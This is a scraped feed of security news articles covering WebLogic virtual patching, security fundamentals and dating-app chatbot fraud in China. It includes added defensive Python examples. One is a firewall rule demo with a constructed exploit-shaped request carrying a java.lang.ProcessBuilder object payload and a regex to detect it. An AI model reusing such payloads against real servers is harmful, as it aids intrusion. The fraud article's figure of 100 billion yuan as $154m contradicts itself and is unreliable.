Virtual patching, blocking the exploit’s requests with a Web application firewall rule, is one workaround that enterprises may want to consider if they are hesitant to deploy an Oracle patch, advises Ullrich. “This type of patching is easy to do if you are trying to block a specific exploit,” he says. “It doesn’t work as well if you are trying to block all exploits in general because it may block something you want to allow in.”
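To make Ullrich’s distinction concrete, here is an added Python example (not from the article, SANS or any WAF vendor) of a request filter with two rule sets: a narrow virtual patch for one assumed exploit shape, and an over-broad rule that blocks any request body mentioning Java. The endpoint path `/example-ws/`, the `<object class="java.…">` payload marker and all three sample requests are assumptions made up for illustration; they are not taken from the public proof of concept.

```python
"""Added example: a narrow virtual patch versus an over-broad blocking rule.

Not code from the article, SANS or any WAF vendor. The endpoint path, the
payload marker and the sample requests are assumptions made for
illustration and are not taken from the public proof of concept.
"""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Request:
    method: str
    path: str
    body: str


@dataclass(frozen=True)
class Rule:
    name: str
    method: Optional[str]       # None matches any method
    path_prefix: Optional[str]  # None matches any path
    body_pattern: re.Pattern

    def matches(self, req: Request) -> bool:
        if self.method and req.method != self.method:
            return False
        if self.path_prefix and not req.path.startswith(self.path_prefix):
            return False
        return self.body_pattern.search(req.body) is not None


def filter_request(req, rules):
    """Return (allowed, blocking_rule). The first matching rule blocks."""
    for rule in rules:
        if rule.matches(req):
            return False, rule.name
    return True, None


# Narrow virtual patch: one method, one (assumed) endpoint, one payload shape.
# The pattern tolerates whitespace and quoting variants so trivial reformatting
# of the same payload does not slip past it.
SPECIFIC_RULES = [
    Rule("vpatch-ws-java-object", "POST", "/example-ws/",
         re.compile(r"<object\s+class\s*=\s*[\"']java\.", re.I)),
]

# Over-broad rule of the kind Ullrich warns about: blocks any body mentioning Java.
BROAD_RULES = [
    Rule("block-java-anywhere", None, None, re.compile(r"\bjava\b", re.I)),
]

# Constructed sample traffic (assumed shapes, not captured requests).
EXPLOIT_SHAPED = Request(
    "POST", "/example-ws/Coordinator",
    "<s:Envelope><s:Header><object class=\"java.lang.ProcessBuilder\"/></s:Header></s:Envelope>",
)
EXPLOIT_REFORMATTED = Request(
    "POST", "/example-ws/Coordinator",
    "<s:Envelope><s:Header><object  class = 'java.lang.ProcessBuilder'/></s:Header></s:Envelope>",
)
BENIGN_HR = Request(
    "POST", "/hr/api/employees",
    "<employee><name>A. Developer</name><skill>Java</skill></employee>",
)


def compare(req):
    """Show how each rule set treats the same request."""
    return {"specific": filter_request(req, SPECIFIC_RULES),
            "broad": filter_request(req, BROAD_RULES)}


if __name__ == "__main__":
    for label, req in [("exploit-shaped", EXPLOIT_SHAPED),
                       ("exploit-reformatted", EXPLOIT_REFORMATTED),
                       ("benign HR update", BENIGN_HR)]:
        print(label, compare(req))
```

The narrow rule blocks both variants of the assumed exploit and passes the HR update; the broad rule blocks the HR update too, which is the false positive Ullrich describes. The caveat is the mirror image: a narrow rule is only as good as its signature, so an attacker who encodes the payload in a way the pattern does not expect walks past it. A virtual patch buys time until the vendor patch is deployed; it does not replace it.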

Sebastian Bortnik, head of Onapsis Research Labs, says that although enterprises have shown some improvement in recent years in patching business-critical applications, they remain far better at patching endpoints and the OS layer than those applications.

“Despite that, some companies have improved and have started building repeatable patch schedules, and ensuring ERP systems have no more than three- to six months of pending patches,” Bortnik says.


Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s …

Article source: https://www.darkreading.com/vulnerabilities---threats/oracle-weblogic-exploit-used-in-cryptocurrency-mining-campaign/d/d-id/1330791?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

‘Back to Basics’ Might Be Your Best Security Weapon

A company’s ability to successfully reduce risk starts with building a solid security foundation.

Despite an influx of best-in-breed security technologies, organizations around the world are seeing a continued rise in cyber attacks. There are big implications. Financial consequences include immediate costs of investigating the breach and extend longer-term to include lawsuits and regulatory fines. Loss of customer trust can translate into declines in business. Perhaps most damaging is the impact of shutting down entire systems, which can grind operations to a halt. This is especially dangerous when the target is a critical healthcare, government, or utility provider.

From the high-profile Equifax breach to payment compromises at hotel chains and retailers, security teams are increasingly under pressure to not only determine why this is happening but what can be done to fix or prevent these problems. For many companies, getting “back to basics” could be one of the most effective weapons in the war on cyberattacks.

It’s About the Fundamentals
Spending more time on maturing and measuring fundamental security controls might have prevented many of the breaches we’ve seen recently. For instance, Equifax was compromised through a Web application vulnerability for which a patch was available but had not been applied. Too often companies underestimate basic security measures, instead prioritizing time and budget for the latest and greatest technology solutions.

Here are ways to stick to the basics of managing cyber-risk to better protect your company.

Achieve Visibility
This is one of the most challenging aspects of security, especially with dispersed assets. You can achieve greater visibility with two complementary approaches:

  • Passive technologies that sit at the gateway or process log data are very effective at detecting when new devices come online; they can then trigger an active scan to gather more information and context about the device and its user.
  • Active scanning technologies that continuously poll the network discover new devices as they come online and report them to a system of record, where more information can be pulled from user directories. An informed decision can then be made about whether the devices need to be handed to the vulnerability management team.
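An added Python example (not from the article or ePlus) of the passive approach described above: it parses constructed DHCP server log lines, checks each MAC address seen against the asset inventory, enriches the unknown devices from a directory lookup and a vendor-prefix table, and produces the hand-off list for active scanning and the vulnerability management team. The log lines, inventory, directory entries, addresses and hostnames are all constructed for the example; the vendor-prefix table is a two-entry stand-in for a full OUI database.

```python
"""Added example: passive asset discovery from DHCP server logs.

Not code from the article or ePlus. The log lines, inventory, directory
entries, addresses and hostnames are constructed for this example; the
vendor-prefix table is a two-entry stand-in for a full OUI database.
"""
import re

# Constructed dhcpd-style syslog lines.
SAMPLE_LOG = """\
Jan 10 08:01:12 dhcp1 dhcpd: DHCPACK on 10.20.4.31 to 3c:52:82:aa:01:10 (fin-laptop-07) via eth0
Jan 10 08:03:40 dhcp1 dhcpd: DHCPACK on 10.20.4.58 to b8:27:eb:13:9f:02 (raspberrypi) via eth0
Jan 10 08:05:02 dhcp1 dhcpd: DHCPACK on 10.20.4.31 to 3c:52:82:aa:01:10 (fin-laptop-07) via eth0
Jan 10 08:09:55 dhcp1 dhcpd: DHCPREQUEST for 10.20.7.12 from 00:11:32:77:ab:cd via eth0
Jan 10 08:09:56 dhcp1 dhcpd: DHCPACK on 10.20.7.12 to 00:11:32:77:ab:cd via eth0
Jan 10 08:12:30 dhcp1 dhcpd: DHCPACK on 10.20.4.77 to 3c:52:82:aa:01:11 (fin-laptop-08) via eth0
"""

# System of record: MAC -> owning team (constructed). fin-laptop-08 was issued
# but never recorded, the gap this kind of check exists to find.
INVENTORY = {"3c:52:82:aa:01:10": {"hostname": "fin-laptop-07", "owner": "endpoint-team"}}
# Stand-in for a user directory lookup by hostname (constructed).
DIRECTORY = {"fin-laptop-07": "j.doe", "fin-laptop-08": "a.smith"}
# Two real vendor prefixes as an example of enrichment; a full table would come
# from the IEEE OUI registry.
OUI = {"b8:27:eb": "Raspberry Pi Foundation", "00:11:32": "Synology"}

ACK = re.compile(
    r"DHCPACK on (?P<ip>\d+\.\d+\.\d+\.\d+) to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: \((?P<host>[^)]*)\))?",
    re.I,
)


def parse_acks(text):
    """MAC -> latest IP, hostname (if the client sent one) and number of sightings."""
    seen = {}
    for line in text.splitlines():
        m = ACK.search(line)
        if not m:
            continue
        mac = m["mac"].lower()
        entry = seen.setdefault(mac, {"host": m["host"] or "", "sightings": 0})
        entry["ip"] = m["ip"]
        entry["sightings"] += 1
    return seen


def find_unknown_assets(text, inventory, directory, oui):
    """Devices seen on the wire but absent from the system of record, enriched for hand-off."""
    unknown = []
    for mac, info in parse_acks(text).items():
        if mac in inventory:
            continue
        unknown.append({
            "mac": mac,
            "ip": info["ip"],
            "hostname": info["host"],
            "user": directory.get(info["host"]),
            "vendor": oui.get(mac[:8]),
            "sightings": info["sightings"],
            # The passive sighting triggers the active step described in the text.
            "action": "active scan, then route to vulnerability management",
        })
    return unknown


if __name__ == "__main__":
    for asset in find_unknown_assets(SAMPLE_LOG, INVENTORY, DIRECTORY, OUI):
        print(asset)
```

Only DHCPACK lines count as a sighting, since a DHCPREQUEST proves nothing about whether the client got onto the network. The three unknown devices come out with different amounts of context: a Raspberry Pi with no directory owner, a NAS that sent no hostname at all, and a laptop whose user is known but which was never added to inventory. All three go to the same place, but the first two are the ones that should worry the vulnerability team.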

Prioritize Vulnerability Management
Continuous assessment of known inventory lowers the risk of exploitation. Many of the recent breaches that used the leaked Shadow Brokers tool set could have been avoided, but too many organizations have weak vulnerability management programs that leave critical systems exposed. The crippling of the UK’s National Health Service by the WannaCry ransomware attack, which targeted basic security weaknesses, was particularly egregious because of the direct impact on patient care.

A robust vulnerability management program can identify these issues so they can be patched, preventing them from being exploited. Some best practices include:

  • Before even starting a program, understand who is responsible for each functional area of IT so the right groups can be alerted when a vulnerability is identified.
  • Obtain buy-in from the system owners who will be affected, typically those managing endpoints, servers, and non-user devices such as printers and video cameras.
  • Have clearly defined next steps once a vulnerability is identified. Too often, companies recognize their vulnerabilities but have no action plan for patching, virtual patching, or another compensating control.
  • Patching servers and applications can inadvertently disrupt business-critical applications and cause downtime, yet comprehensive patch management is time-consuming. Putting a strong development team in place can accelerate the patch process. Alternatively, virtual patching can detect an active exploit attempt and stop it at another layer, whether in the OS itself or at a network function or gateway.

Layer on Next-Gen Technology
With these baseline controls in place, next-generation threat prevention solutions such as anti-malware software, firewalls, and Web/email protections can be more successfully integrated into a company’s architecture and associated operational structure.

This also matters as security solutions become more sophisticated, sometimes combining different technologies into one more powerful platform. For instance, next-gen endpoint products go beyond traditional endpoint protection with machine learning, artificial intelligence, integration, and open APIs. But fitting these features into an orchestrated operational model adds complexity for analysts and operators, and care should be taken to ensure the manual concepts and skills are understood before the enhanced features are relied on.

Master Manual Processes Before You Automate
Automating certain security controls can be extremely beneficial, helping analysts investigate and triage events more efficiently by pulling together multiple sources of records and providing context: the traffic involved, the user, the intellectual property on the device, and what the device was doing before and after the event. But automation can also greatly increase risk if done too quickly. It does the heavy lifting, but it will not make you an instant expert; orchestration and automation still need skilled people behind them. It is therefore much more effective and reliable to first create well-defined and tested manual processes, and only then write the automation scripts and playbooks.

While there’s no guaranteed security solution, a company’s ability to successfully reduce risk starts with building a solid security foundation. These baseline concepts are essential, and understanding the capabilities of technologies currently in place will help make operations more secure in the long term.


Lee Waskevich, Vice President, Security Solutions at ePlus Technology, is responsible for overall strategy for the ePlus Security practice. Lee and his team design and deliver tailored cybersecurity programs aimed at mitigating business risk, fortifying digital …

Article source: https://www.darkreading.com/vulnerabilities---threats/back-to-basics-might-be-your-best-security-weapon/a/d-id/1330767?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Beautiful webchat honeys turn out to be fembots

Police in Guangdong, China, announced on Monday that there will henceforth be a sizable population of homeless dating app fembots.

This comes after police successfully “smashed” the 21 companies the chatbots called home. Police said they’ve arrested more than 600 suspects on suspicion of mobile app network fraud, froze a total of 100 billion yuan (USD $154m; £113m), and seized more than 400 servers, computers, mobile phones, books and more.

Authorities have been working on the massive fraud network since August 2017. They were tipped off after coming across a mobile app that was charging visitors to view porn videos that didn’t actually exist.

The crackdown, dubbed “Security Network No. 20”, was carried out simultaneously in 11 cities, including Zhuhai, Shantou and Dongguan in Guangdong, as well as in Beijing, Liaoning, Shaanxi, Henan, Shandong, Jiangsu, Zhejiang, Hunan, Hubei, Jiangxi, Fujian and Guangxi: 13 provinces, autonomous regions and municipalities in total.

A task force found the dating-app fembots “making friends”, which in practice meant dangling porn as bait to get men to register for the apps, using flirty phrases such as (what Google translates as) “a city courtship,” “party dating,” and “a city secret tease.”

Once the dating apps had lured men into downloading and installing them, surprise! The apps would continuously push users to upgrade their membership level.

Police said that the companies behind the apps found there were not enough human women available to respond to users in a timely manner, so the criminal gangs had their techies write robot programs that posed as female users and responded to app users automatically.

The apps would send pre-written greetings to newly registered users, and the fembots would ask for gifts to tease yet more money out of unsuspecting men. Police said that after about 60 seconds of a porn video playing, the apps would tell users they needed to top up their membership to keep watching. After paying, users were let into the member-level content area and the video resumed, but the interface would continue to push them to pay again.

Do these devilishly developed divas sound familiar? They should: notorious cheaters’ site and devastatingly hacked dating-app Ashley Madison was probed by the Federal Trade Commission (FTC) about its own battalion of fembots.

Then too, there was that army of 86,262 sex-starved bots that flooded Twitter, looking to be #fondled, for somebody to take their #virgin, and asking a young man if he wants a vulgar.

Not interested in having your money #fondled out of your wallet? Not in the market for some vulgar? Then guard against dating app scams with our top tips on how to avoid forking over money to internet cutie pies.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/RRi7ilUg2Tg/